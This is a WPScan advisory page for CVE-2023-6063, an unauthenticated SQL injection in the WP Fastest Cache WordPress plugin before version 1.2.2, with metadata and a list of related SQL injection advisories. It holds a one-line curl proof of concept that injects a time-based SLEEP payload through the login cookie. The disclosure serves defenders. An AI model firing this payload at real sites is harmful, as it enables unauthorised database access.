WP Fastest Cache < 1.2.2 – Unauthenticated SQL Injection | CVE 2023-6063 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.

Proof of Concept

1. Visit WP Fastest Cache > Settings. Ensure "Cache System" is enabled, and "Logged-in Users" is disabled. Click "Submit" at the bottom.

2. The following curl command demonstrates the SQLi:

curl https://example.com -H "Cookie: wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts"

Affects Plugins

wp-fastest-cache

Fixed in 1.2.2

References

CVE

URL

https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Alex Sanford

Submitter

Alex Sanford

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

30a74105-8ade-4198-abe2-1c6f2967443e

Timeline

Publicly Published

2023-11-13 (about 2 years ago)

Added

2023-11-13 (about 2 years ago)

Last Updated

2023-11-14 (about 2 years ago)

Other

Published

Title

Published

2025-10-21

Title

Email Tracker < 5.3.16 - Authenticated (Admin+) SQL Injection

Published

2024-04-03

Title

REHub Framework < 19.6.2 - Authenticated (Subscriber+) SQL Injection

Published

2017-07-05

Title

Add Edit Delete Listing For Member Module <= 1.0 - SQL Injection

Published

2024-09-16

Title

WPCargo Track & Trace <= 8.0.2 - Unauthenticated SQL Injection

Published

2015-07-15

Title

Smooth Slider < 2.7 - Authenticated SQL Injection